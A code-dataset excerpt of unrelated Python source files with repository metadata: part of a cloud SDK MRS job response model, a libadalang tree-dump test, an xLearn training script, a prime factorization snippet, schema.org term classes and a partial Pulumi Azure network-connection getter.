        Path of the executable JAR file or SQL file, which must meet the following requirements: - At most 1023 characters, must not contain the special characters ;|&><'$, and cannot be empty or all spaces. - Must start with "/" or "s3a://"; OBS paths do not support KMS-encrypted files or programs. - Spark Script files must end with ".sql"; MapReduce and Spark JAR files must end with ".jar"; sql and jar are case-insensitive.
:param jar_path: The jar_path of this CreateAndExecuteJobResponse.
:type jar_path: str
"""
self._jar_path = jar_path
@property
def input(self):
"""Gets the input of this CreateAndExecuteJobResponse.
        Data input path, which must start with "/" or "s3a://". Configure a valid OBS path; OBS paths do not support KMS-encrypted files or programs. At most 1023 characters, must not contain the special characters ;|&>'<$, and may be empty.
:return: The input of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._input
@input.setter
def input(self, input):
"""Sets the input of this CreateAndExecuteJobResponse.
        Data input path, which must start with "/" or "s3a://". Configure a valid OBS path; OBS paths do not support KMS-encrypted files or programs. At most 1023 characters, must not contain the special characters ;|&>'<$, and may be empty.
:param input: The input of this CreateAndExecuteJobResponse.
:type input: str
"""
self._input = input
@property
def output(self):
"""Gets the output of this CreateAndExecuteJobResponse.
        Data output path, which must start with "/" or "s3a://". Configure a valid OBS path; if the path does not exist, the system creates it automatically. At most 1023 characters, must not contain the special characters ;|&>'<$, and may be empty.
:return: The output of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._output
@output.setter
def output(self, output):
"""Sets the output of this CreateAndExecuteJobResponse.
        Data output path, which must start with "/" or "s3a://". Configure a valid OBS path; if the path does not exist, the system creates it automatically. At most 1023 characters, must not contain the special characters ;|&>'<$, and may be empty.
:param output: The output of this CreateAndExecuteJobResponse.
:type output: str
"""
self._output = output
@property
def job_log(self):
"""Gets the job_log of this CreateAndExecuteJobResponse.
        Path for storing job logs that record the job's running status. Must start with "/" or "s3a://"; configure a valid OBS path. At most 1023 characters, must not contain the special characters ;|&>'<$, and may be empty.
:return: The job_log of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._job_log
@job_log.setter
def job_log(self, job_log):
"""Sets the job_log of this CreateAndExecuteJobResponse.
        Path for storing job logs that record the job's running status. Must start with "/" or "s3a://"; configure a valid OBS path. At most 1023 characters, must not contain the special characters ;|&>'<$, and may be empty.
:param job_log: The job_log of this CreateAndExecuteJobResponse.
:type job_log: str
"""
self._job_log = job_log
@property
def job_type(self):
"""Gets the job_type of this CreateAndExecuteJobResponse.
        Job type code. - 1: MapReduce - 2: Spark - 3: Hive Script - 4: HiveSQL (currently not supported) - 5: DistCp, for importing and exporting data - 6: Spark Script - 7: Spark SQL, for submitting SQL statements (currently not supported by this API) Note: only clusters that include the Spark and Hive components can create Spark and Hive jobs.
:return: The job_type of this CreateAndExecuteJobResponse.
:rtype: int
"""
return self._job_type
@job_type.setter
def job_type(self, job_type):
"""Sets the job_type of this CreateAndExecuteJobResponse.
        Job type code. - 1: MapReduce - 2: Spark - 3: Hive Script - 4: HiveSQL (currently not supported) - 5: DistCp, for importing and exporting data - 6: Spark Script - 7: Spark SQL, for submitting SQL statements (currently not supported by this API) Note: only clusters that include the Spark and Hive components can create Spark and Hive jobs.
:param job_type: The job_type of this CreateAndExecuteJobResponse.
:type job_type: int
"""
self._job_type = job_type
@property
def file_action(self):
"""Gets the file_action of this CreateAndExecuteJobResponse.
        File operation type. Options: - export: export data from HDFS to OBS - import: import data from OBS to HDFS
:return: The file_action of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._file_action
@file_action.setter
def file_action(self, file_action):
"""Sets the file_action of this CreateAndExecuteJobResponse.
        File operation type. Options: - export: export data from HDFS to OBS - import: import data from OBS to HDFS
:param file_action: The file_action of this CreateAndExecuteJobResponse.
:type file_action: str
"""
self._file_action = file_action
@property
def arguments(self):
"""Gets the arguments of this CreateAndExecuteJobResponse.
        Key parameters for program execution, specified by functions inside the user program; MRS only passes them through. At most 150000 characters, must not contain the special characters ;|&>'<$!\\\"\\, and may be empty. Note: when a parameter contains sensitive information (such as a login password), prefix the parameter name with "@" to encrypt its value and keep it from being persisted in plain text. When job information is viewed, sensitive values are shown as "*". Example: username=admin @password=admin_123
:return: The arguments of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._arguments
@arguments.setter
def arguments(self, arguments):
"""Sets the arguments of this CreateAndExecuteJobResponse.
        Key parameters for program execution, specified by functions inside the user program; MRS only passes them through. At most 150000 characters, must not contain the special characters ;|&>'<$!\\\"\\, and may be empty. Note: when a parameter contains sensitive information (such as a login password), prefix the parameter name with "@" to encrypt its value and keep it from being persisted in plain text. When job information is viewed, sensitive values are shown as "*". Example: username=admin @password=admin_123
:param arguments: The arguments of this CreateAndExecuteJobResponse.
:type arguments: str
"""
self._arguments = arguments
@property
def hql(self):
"""Gets the hql of this CreateAndExecuteJobResponse.
        Hive & Spark SQL statement.
:return: The hql of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._hql
@hql.setter
def hql(self, hql):
"""Sets the hql of this CreateAndExecuteJobResponse.
        Hive & Spark SQL statement.
:param hql: The hql of this CreateAndExecuteJobResponse.
:type hql: str
"""
self._hql = hql
@property
def job_state(self):
"""Gets the job_state of this CreateAndExecuteJobResponse.
        Job status code. - 1: Terminated - 2: Starting - 3: Running - 4: Completed - 5: Abnormal - 6: Error
:return: The job_state of this CreateAndExecuteJobResponse.
:rtype: int
"""
return self._job_state
@job_state.setter
def job_state(self, job_state):
"""Sets the job_state of this CreateAndExecuteJobResponse.
        Job status code. - 1: Terminated - 2: Starting - 3: Running - 4: Completed - 5: Abnormal - 6: Error
:param job_state: The job_state of this CreateAndExecuteJobResponse.
:type job_state: int
"""
self._job_state = job_state
@property
def job_final_status(self):
"""Gets the job_final_status of this CreateAndExecuteJobResponse.
        Final job status code. - 0: unfinished - 1: execution error, terminated - 2: completed successfully - 3: canceled
:return: The job_final_status of this CreateAndExecuteJobResponse.
:rtype: int
"""
return self._job_final_status
@job_final_status.setter
def job_final_status(self, job_final_status):
"""Sets the job_final_status of this CreateAndExecuteJobResponse.
        Final job status code. - 0: unfinished - 1: execution error, terminated - 2: completed successfully - 3: canceled
:param job_final_status: The job_final_status of this CreateAndExecuteJobResponse.
:type job_final_status: int
"""
self._job_final_status = job_final_status
@property
def hive_script_path(self):
"""Gets the hive_script_path of this CreateAndExecuteJobResponse.
        Path of the SQL program, required only for Spark Script and Hive Script jobs. It must meet the following requirements: - At most 1023 characters, must not contain the special characters ;|&><'$, and cannot be empty or all spaces. - Must start with "/" or "s3a://"; OBS paths do not support KMS-encrypted files or programs. - Must end with ".sql"; sql is case-insensitive.
:return: The hive_script_path of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._hive_script_path
@hive_script_path.setter
def hive_script_path(self, hive_script_path):
"""Sets the hive_script_path of this CreateAndExecuteJobResponse.
        Path of the SQL program, required only for Spark Script and Hive Script jobs. It must meet the following requirements: - At most 1023 characters, must not contain the special characters ;|&><'$, and cannot be empty or all spaces. - Must start with "/" or "s3a://"; OBS paths do not support KMS-encrypted files or programs. - Must end with ".sql"; sql is case-insensitive.
:param hive_script_path: The hive_script_path of this CreateAndExecuteJobResponse.
:type hive_script_path: str
"""
self._hive_script_path = hive_script_path
@property
def create_by(self):
"""Gets the create_by of this CreateAndExecuteJobResponse.
        ID of the user who created the job. Retained for compatibility with earlier versions.
:return: The create_by of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._create_by
@create_by.setter
def create_by(self, create_by):
"""Sets the create_by of this CreateAndExecuteJobResponse.
        ID of the user who created the job. Retained for compatibility with earlier versions.
:param create_by: The create_by of this CreateAndExecuteJobResponse.
:type create_by: str
"""
self._create_by = create_by
@property
def finished_step(self):
"""Gets the finished_step of this CreateAndExecuteJobResponse.
        Number of steps completed so far. Retained for compatibility with earlier versions.
:return: The finished_step of this CreateAndExecuteJobResponse.
:rtype: int
"""
return self._finished_step
@finished_step.setter
def finished_step(self, finished_step):
"""Sets the finished_step of this CreateAndExecuteJobResponse.
        Number of steps completed so far. Retained for compatibility with earlier versions.
:param finished_step: The finished_step of this CreateAndExecuteJobResponse.
:type finished_step: int
"""
self._finished_step = finished_step
@property
def job_main_id(self):
"""Gets the job_main_id of this CreateAndExecuteJobResponse.
        Main job ID. Retained for compatibility with earlier versions.
:return: The job_main_id of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._job_main_id
@job_main_id.setter
def job_main_id(self, job_main_id):
"""Sets the job_main_id of this CreateAndExecuteJobResponse.
        Main job ID. Retained for compatibility with earlier versions.
:param job_main_id: The job_main_id of this CreateAndExecuteJobResponse.
:type job_main_id: str
"""
self._job_main_id = job_main_id
@property
def job_step_id(self):
"""Gets the job_step_id of this CreateAndExecuteJobResponse.
        Job step ID. Retained for compatibility with earlier versions.
:return: The job_step_id of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._job_step_id
@job_step_id.setter
def job_step_id(self, job_step_id):
"""Sets the job_step_id of this CreateAndExecuteJobResponse.
        Job step ID. Retained for compatibility with earlier versions.
:param job_step_id: The job_step_id of this CreateAndExecuteJobResponse.
:type job_step_id: str
"""
self._job_step_id = job_step_id
@property
def postpone_at(self):
"""Gets the postpone_at of this CreateAndExecuteJobResponse.
        Delay time, as a 10-digit timestamp. Retained for compatibility with earlier versions.
:return: The postpone_at of this CreateAndExecuteJobResponse.
:rtype: int
"""
return self._postpone_at
@postpone_at.setter
def postpone_at(self, postpone_at):
"""Sets the postpone_at of this CreateAndExecuteJobResponse.
        Delay time, as a 10-digit timestamp. Retained for compatibility with earlier versions.
:param postpone_at: The postpone_at of this CreateAndExecuteJobResponse.
:type postpone_at: int
"""
self._postpone_at = postpone_at
@property
def step_name(self):
"""Gets the step_name of this CreateAndExecuteJobResponse.
        Job step name. Retained for compatibility with earlier versions.
:return: The step_name of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._step_name
@step_name.setter
def step_name(self, step_name):
"""Sets the step_name of this CreateAndExecuteJobResponse.
        Job step name. Retained for compatibility with earlier versions.
:param step_name: The step_name of this CreateAndExecuteJobResponse.
:type step_name: str
"""
self._step_name = step_name
@property
def step_num(self):
"""Gets the step_num of this CreateAndExecuteJobResponse.
        Number of steps. Retained for compatibility with earlier versions.
:return: The step_num of this CreateAndExecuteJobResponse.
:rtype: int
"""
return self._step_num
@step_num.setter
def step_num(self, step_num):
"""Sets the step_num of this CreateAndExecuteJobResponse.
        Number of steps. Retained for compatibility with earlier versions.
:param step_num: The step_num of this CreateAndExecuteJobResponse.
:type step_num: int
"""
self._step_num = step_num
@property
def task_num(self):
"""Gets the task_num of this CreateAndExecuteJobResponse.
        Number of tasks. Retained for compatibility with earlier versions.
:return: The task_num of this CreateAndExecuteJobResponse.
:rtype: int
"""
return self._task_num
@task_num.setter
def task_num(self, task_num):
"""Sets the task_num of this CreateAndExecuteJobResponse.
        Number of tasks. Retained for compatibility with earlier versions.
:param task_num: The task_num of this CreateAndExecuteJobResponse.
:type task_num: int
"""
self._task_num = task_num
@property
def update_by(self):
"""Gets the update_by of this CreateAndExecuteJobResponse.
        ID of the user who updated the job.
:return: The update_by of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._update_by
@update_by.setter
def update_by(self, update_by):
"""Sets the update_by of this CreateAndExecuteJobResponse.
        ID of the user who updated the job.
:param update_by: The update_by of this CreateAndExecuteJobResponse.
:type update_by: str
"""
self._update_by = update_by
@property
def credentials(self):
"""Gets the credentials of this CreateAndExecuteJobResponse.
        Token. Not supported in the current version.
:return: The credentials of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._credentials
@credentials.setter
def credentials(self, credentials):
"""Sets the credentials of this CreateAndExecuteJobResponse.
        Token. Not supported in the current version.
:param credentials: The credentials of this CreateAndExecuteJobResponse.
:type credentials: str
"""
self._credentials = credentials
@property
def user_id(self):
"""Gets the user_id of this CreateAndExecuteJobResponse.
        ID of the user who created the job. Kept for compatibility with earlier versions; no longer used.
:return: The user_id of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._user_id
@user_id.setter
def user_id(self, user_id):
"""Sets the user_id of this CreateAndExecuteJobResponse.
        ID of the user who created the job. Kept for compatibility with earlier versions; no longer used.
:param user_id: The user_id of this CreateAndExecuteJobResponse.
:type user_id: str
"""
self._user_id = user_id
@property
def job_configs(self):
"""Gets the job_configs of this CreateAndExecuteJobResponse.
        Key-value pairs holding the job's runtime configuration.
:return: The job_configs of this CreateAndExecuteJobResponse.
:rtype: dict(str, object)
"""
return self._job_configs
@job_configs.setter
def job_configs(self, job_configs):
"""Sets the job_configs of this CreateAndExecuteJobResponse.
        Key-value pairs holding the job's runtime configuration.
:param job_configs: The job_configs of this CreateAndExecuteJobResponse.
:type job_configs: dict(str, object)
"""
self._job_configs = job_configs
@property
def extra(self):
"""Gets the extra of this CreateAndExecuteJobResponse.
        Authentication information. Not supported in the current version.
:return: The extra of this CreateAndExecuteJobResponse.
:rtype: dict(str, object)
"""
return self._extra
@extra.setter
def extra(self, extra):
"""Sets the extra of this CreateAndExecuteJobResponse.
        Authentication information. Not supported in the current version.
:param extra: The extra of this CreateAndExecuteJobResponse.
:type extra: dict(str, object)
"""
self._extra = extra
@property
def data_source_urls(self):
"""Gets the data_source_urls of this CreateAndExecuteJobResponse.
        Data source URLs.
:return: The data_source_urls of this CreateAndExecuteJobResponse.
:rtype: dict(str, object)
"""
return self._data_source_urls
@data_source_urls.setter
def data_source_urls(self, data_source_urls):
"""Sets the data_source_urls of this CreateAndExecuteJobResponse.
        Data source URLs.
:param data_source_urls: The data_source_urls of this CreateAndExecuteJobResponse.
:type data_source_urls: dict(str, object)
"""
self._data_source_urls = data_source_urls
@property
def info(self):
"""Gets the info of this CreateAndExecuteJobResponse.
        Key-value pairs containing job runtime information returned by Oozie.
:return: The info of this CreateAndExecuteJobResponse.
:rtype: dict(str, object)
"""
return self._info
@info.setter
def info(self, info):
"""Sets the info of this CreateAndExecuteJobResponse.
        Key-value pairs containing job runtime information returned by Oozie.
:param info: The info of this CreateAndExecuteJobResponse.
:type info: dict(str, object)
"""
self._info = info
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
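        # Recursively serialize nested models, lists, and dicts; mask attributes marked sensitive.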
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, CreateAndExecuteJobResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
a675336b4dc62a30aa251f219974a12b74203fb7
|
6b6d42eadf53e90b08ce564fb188a9a4b126ef12
|
/testsuite/tests/python/tree_dump/test.py
|
cad1282edb64be39e438e835f88aefe928140e64
|
[
"Apache-2.0",
"LLVM-exception",
"NCSA"
] |
permissive
|
AdaCore/libadalang
|
f97b95d1672cb1e5083c49ee632c6f9c787d36c2
|
50d658afa70ccbf46b8f7d9d43a21d45d56b206c
|
refs/heads/master
| 2023-09-01T18:34:26.976692
| 2023-08-25T15:53:43
| 2023-08-25T15:53:43
| 47,627,172
| 158
| 49
|
Apache-2.0
| 2022-12-14T10:29:45
| 2015-12-08T14:28:22
|
Ada
|
UTF-8
|
Python
| false
| false
| 399
|
py
|
test.py
|
from libadalang import AnalysisContext
def dump(node, indent=0):
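    # Recursively print each node's kind name, indenting one level per depth in the tree.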
indent_str = '| ' * indent
if node is None:
print('{}<null node>'.format(indent_str))
return
print('{}<{}>'.format(indent_str, node.kind_name))
for child in node:
dump(child, indent + 1)
ctx = AnalysisContext('iso-8859-1')
unit = ctx.get_from_file('foo.adb')
dump(unit.root)
print('Done')
|
8641f3ba59a56757c00f78449ad28fc8968c2418
|
855b013907d33b7e1bb74f688e5314b0e9bae510
|
/python-package/test/test_python.py
|
b1c2b76564cef1d20db446b23269a022b3fa2896
|
[
"Apache-2.0"
] |
permissive
|
aksnzhy/xlearn
|
5b3f3aa29b31c7080a3e0835f073d34157878c44
|
4c240aa0aa63c1d105fb9aec583adc2ad2840368
|
refs/heads/master
| 2023-09-01T08:44:21.447056
| 2022-06-05T10:44:18
| 2022-06-05T10:44:18
| 93,925,242
| 3,261
| 624
|
Apache-2.0
| 2023-08-28T05:18:27
| 2017-06-10T08:09:31
|
C++
|
UTF-8
|
Python
| false
| false
| 1,569
|
py
|
test_python.py
|
# Copyright (c) 2018 by contributors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
# This file test the xlearn python package.
# We create a ffm model for binary classification problem.
# The dataset comes from the criteo CTR.
from __future__ import absolute_import
import xlearn as xl
# Training task
ffm_model = xl.create_ffm() # Use field-aware factorization machine
ffm_model.setTrain("./small_train.txt") # Training data
ffm_model.setValidate("./small_test.txt") # Validation data
# param:
# 0. binary classification
# 1. learning rate: 0.2
# 2. regular lambda: 0.002
# 3. evaluation metric: accuracy
param = {'task':'binary', 'lr':0.2,
'lambda':0.002, 'metric':'acc'}
# Start to train
# The trained model will be stored in model.out
ffm_model.fit(param, './model.out')
# Prediction task
ffm_model.setTest("./small_test.txt") # Test data
ffm_model.setSigmoid() # Convert output to 0-1
# Start to predict
# The output result will be stored in output.txt
ffm_model.predict("./model.out", "./output.txt")
|
90489dd4d802c08631cdf6b9aa65be1e55b23e8a
|
a0eb6744e6f7f509b96d21f0bc8b3f8387f6861c
|
/notebook/prime_factorization.py
|
8a473e810e06e0738394a0d04f3fd2f07608aa3e
|
[
"MIT"
] |
permissive
|
nkmk/python-snippets
|
a6c66bdf999502e52f4795a3074ced63bf440817
|
f9dd286a9cf93f474e20371f8fffc4732cb3c4d5
|
refs/heads/master
| 2023-08-03T04:20:05.606293
| 2023-07-26T13:21:11
| 2023-07-26T13:21:11
| 98,900,570
| 253
| 77
|
MIT
| 2020-10-25T01:12:53
| 2017-07-31T14:54:47
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 703
|
py
|
prime_factorization.py
|
import collections
def prime_factorize(n):
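    # Trial division: strip factors of 2 first, then test odd candidates up to sqrt(n).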
a = []
while n % 2 == 0:
a.append(2)
n //= 2
f = 3
while f * f <= n:
if n % f == 0:
a.append(f)
n //= f
else:
f += 2
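    # Whatever remains above 1 at this point is itself prime.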
if n != 1:
a.append(n)
return a
print(prime_factorize(1))
# []
print(prime_factorize(36))
# [2, 2, 3, 3]
print(prime_factorize(840))
# [2, 2, 2, 3, 5, 7]
c = collections.Counter(prime_factorize(840))
print(c)
# Counter({2: 3, 3: 1, 5: 1, 7: 1})
print(c.keys())
# dict_keys([2, 3, 5, 7])
print(c.values())
# dict_values([3, 1, 1, 1])
print(c.items())
# dict_items([(2, 3), (3, 1), (5, 1), (7, 1)])
print(list(c.keys()))
# [2, 3, 5, 7]
|
18114bee0654847097d3f346f019f8085accc5ca
|
2a271a3827527456aaee84c2bc6f365d5d083722
|
/software/SchemaTerms/sdoterm.py
|
c1d2bb118b5b620dc6a890f206a254c7d75831eb
|
[
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
schemaorg/schemaorg
|
a003f55f639c4c0c6b34aac2615f01264f5fe615
|
bd3df4106937863a6ae9351fcb4782b67a016357
|
refs/heads/main
| 2023-08-15T04:51:12.309628
| 2023-07-19T10:25:18
| 2023-07-19T10:25:18
| 16,394,957
| 5,326
| 969
|
Apache-2.0
| 2023-08-23T14:27:50
| 2014-01-30T23:58:35
|
HTML
|
UTF-8
|
Python
| false
| false
| 2,419
|
py
|
sdoterm.py
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import logging
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
import rdflib
from rdflib import URIRef
import io
class SdoTerm():
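    # Term kind constants; termType holds one of these for every term instance.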
TYPE = "Type"
PROPERTY = "Property"
DATATYPE = "Datatype"
ENUMERATION = "Enumeration"
ENUMERATIONVALUE = "Enumerationvalue"
REFERENCE = "Reference"
def __init__(self,termType,Id,uri,label):
self.expanded = False
self.termType = termType
self.uri = uri
self.id = Id
self.label = label
self.acknowledgements = []
self.superPaths = []
self.comment = ""
self.comments = []
self.equivalents = []
self.examples = []
self.pending = False
self.retired = False
self.extLayer = ""
self.sources = []
self.subs = []
self.supers = []
self.supersededBy = ""
self.supersedes = ""
self.superseded = False
self.termStack = []
def __str__(self):
return ("<%s: '%s' expanded: %s>") % (self.__class__.__name__.upper(),self.id,self.expanded)
class SdoType(SdoTerm):
def __init__(self,Id,uri,label):
SdoTerm.__init__(self,SdoTerm.TYPE,Id,uri,label)
self.properties = []
self.allproperties = []
self.expectedTypeFor = []
class SdoProperty(SdoTerm):
def __init__(self,Id,uri,label):
SdoTerm.__init__(self,SdoTerm.PROPERTY,Id,uri,label)
self.domainIncludes = []
self.rangeIncludes = []
self.inverse = ""
class SdoDataType(SdoTerm):
def __init__(self,Id,uri,label):
SdoTerm.__init__(self,SdoTerm.DATATYPE,Id,uri,label)
self.properties = []
self.allproperties = []
self.expectedTypeFor = []
class SdoEnumeration(SdoTerm):
def __init__(self,Id,uri,label):
SdoTerm.__init__(self,SdoTerm.ENUMERATION,Id,uri,label)
self.properties = []
self.allproperties = []
self.expectedTypeFor = []
self.enumerationMembers = []
class SdoEnumerationvalue(SdoTerm):
def __init__(self,Id,uri,label):
SdoTerm.__init__(self,SdoTerm.ENUMERATIONVALUE,Id,uri,label)
self.enumerationParent = ""
class SdoReference(SdoTerm):
def __init__(self,Id,uri,label):
SdoTerm.__init__(self,SdoTerm.REFERENCE,Id,uri,label)
|
242ca9e1de638fd70ec3c13adbd425d88e523dea
|
b049a961f100444dde14599bab06a0a4224d869b
|
/sdk/python/pulumi_azure_native/devcenter/get_network_connection.py
|
4934486fee2c1fdbaf7be7cd700940c818c31cf2
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
pulumi/pulumi-azure-native
|
b390c88beef8381f9a71ab2bed5571e0dd848e65
|
4c499abe17ec6696ce28477dde1157372896364e
|
refs/heads/master
| 2023-08-30T08:19:41.564780
| 2023-08-28T19:29:04
| 2023-08-28T19:29:04
| 172,386,632
| 107
| 29
|
Apache-2.0
| 2023-09-14T13:17:00
| 2019-02-24T20:30:21
|
Python
|
UTF-8
|
Python
| false
| false
| 10,932
|
py
|
get_network_connection.py
|
# coding=utf-8
# *** WARNING: this file was generated by pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetNetworkConnectionResult',
'AwaitableGetNetworkConnectionResult',
'get_network_connection',
'get_network_connection_output',
]
@pulumi.output_type
class GetNetworkConnectionResult:
"""
Network related settings
"""
def __init__(__self__, domain_join_type=None, domain_name=None, domain_password=None, domain_username=None, health_check_status=None, id=None, location=None, name=None, networking_resource_group_name=None, organization_unit=None, provisioning_state=None, subnet_id=None, system_data=None, tags=None, type=None):
if domain_join_type and not isinstance(domain_join_type, str):
raise TypeError("Expected argument 'domain_join_type' to be a str")
pulumi.set(__self__, "domain_join_type", domain_join_type)
if domain_name and not isinstance(domain_name, str):
raise TypeError("Expected argument 'domain_name' to be a str")
pulumi.set(__self__, "domain_name", domain_name)
if domain_password and not isinstance(domain_password, str):
raise TypeError("Expected argument 'domain_password' to be a str")
pulumi.set(__self__, "domain_password", domain_password)
if domain_username and not isinstance(domain_username, str):
raise TypeError("Expected argument 'domain_username' to be a str")
pulumi.set(__self__, "domain_username", domain_username)
if health_check_status and not isinstance(health_check_status, str):
raise TypeError("Expected argument 'health_check_status' to be a str")
pulumi.set(__self__, "health_check_status", health_check_status)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if networking_resource_group_name and not isinstance(networking_resource_group_name, str):
raise TypeError("Expected argument 'networking_resource_group_name' to be a str")
pulumi.set(__self__, "networking_resource_group_name", networking_resource_group_name)
if organization_unit and not isinstance(organization_unit, str):
raise TypeError("Expected argument 'organization_unit' to be a str")
pulumi.set(__self__, "organization_unit", organization_unit)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if subnet_id and not isinstance(subnet_id, str):
raise TypeError("Expected argument 'subnet_id' to be a str")
pulumi.set(__self__, "subnet_id", subnet_id)
if system_data and not isinstance(system_data, dict):
raise TypeError("Expected argument 'system_data' to be a dict")
pulumi.set(__self__, "system_data", system_data)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="domainJoinType")
def domain_join_type(self) -> str:
"""
AAD Join type.
"""
return pulumi.get(self, "domain_join_type")
@property
@pulumi.getter(name="domainName")
def domain_name(self) -> Optional[str]:
"""
Active Directory domain name
"""
return pulumi.get(self, "domain_name")
@property
@pulumi.getter(name="domainPassword")
def domain_password(self) -> Optional[str]:
"""
The password for the account used to join domain
"""
return pulumi.get(self, "domain_password")
@property
@pulumi.getter(name="domainUsername")
def domain_username(self) -> Optional[str]:
"""
The username of an Active Directory account (user or service account) that has permissions to create computer objects in Active Directory. Required format: admin@contoso.com.
"""
return pulumi.get(self, "domain_username")
@property
@pulumi.getter(name="healthCheckStatus")
def health_check_status(self) -> str:
"""
Overall health status of the network connection. Health checks are run on creation, update, and periodically to validate the network connection.
"""
return pulumi.get(self, "health_check_status")
@property
@pulumi.getter
def id(self) -> str:
"""
Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> str:
"""
The geo-location where the resource lives
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="networkingResourceGroupName")
def networking_resource_group_name(self) -> Optional[str]:
"""
The name for resource group where NICs will be placed.
"""
return pulumi.get(self, "networking_resource_group_name")
@property
@pulumi.getter(name="organizationUnit")
def organization_unit(self) -> Optional[str]:
"""
Active Directory domain Organization Unit (OU)
"""
return pulumi.get(self, "organization_unit")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioning state of the resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> str:
"""
The subnet to attach Virtual Machines to
"""
return pulumi.get(self, "subnet_id")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> 'outputs.SystemDataResponse':
"""
Azure Resource Manager metadata containing createdBy and modifiedBy information.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
"""
return pulumi.get(self, "type")
class AwaitableGetNetworkConnectionResult(GetNetworkConnectionResult):
# pylint: disable=using-constant-test
def __await__(self):
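        # The unreachable yield turns this method into a generator, making the result awaitable.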
if False:
yield self
return GetNetworkConnectionResult(
domain_join_type=self.domain_join_type,
domain_name=self.domain_name,
domain_password=self.domain_password,
domain_username=self.domain_username,
health_check_status=self.health_check_status,
id=self.id,
location=self.location,
name=self.name,
networking_resource_group_name=self.networking_resource_group_name,
organization_unit=self.organization_unit,
provisioning_state=self.provisioning_state,
subnet_id=self.subnet_id,
system_data=self.system_data,
tags=self.tags,
type=self.type)
def get_network_connection(network_connection_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetNetworkConnectionResult:
"""
Gets a network connection resource
Azure REST API version: 2023-04-01.
:param str network_connection_name: Name of the Network Connection that can be applied to a Pool.
:param str resource_group_name: The name of the resource group. The name is case insensitive.
"""
__args__ = dict()
__args__['networkConnectionName'] = network_connection_name
__args__['resourceGroupName'] = resource_group_name
opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)
__ret__ = pulumi.runtime.invoke('azure-native:devcenter:getNetworkConnection', __args__, opts=opts, typ=GetNetworkConnectionResult).value
return AwaitableGetNetworkConnectionResult(
domain_join_type=pulumi.get(__ret__, 'domain_join_type'),
domain_name=pulumi.get(__ret__, 'domain_name'),
domain_password=pulumi.get(__ret__, 'domain_password'),
domain_username=pulumi.get(__ret__, 'domain_username'),
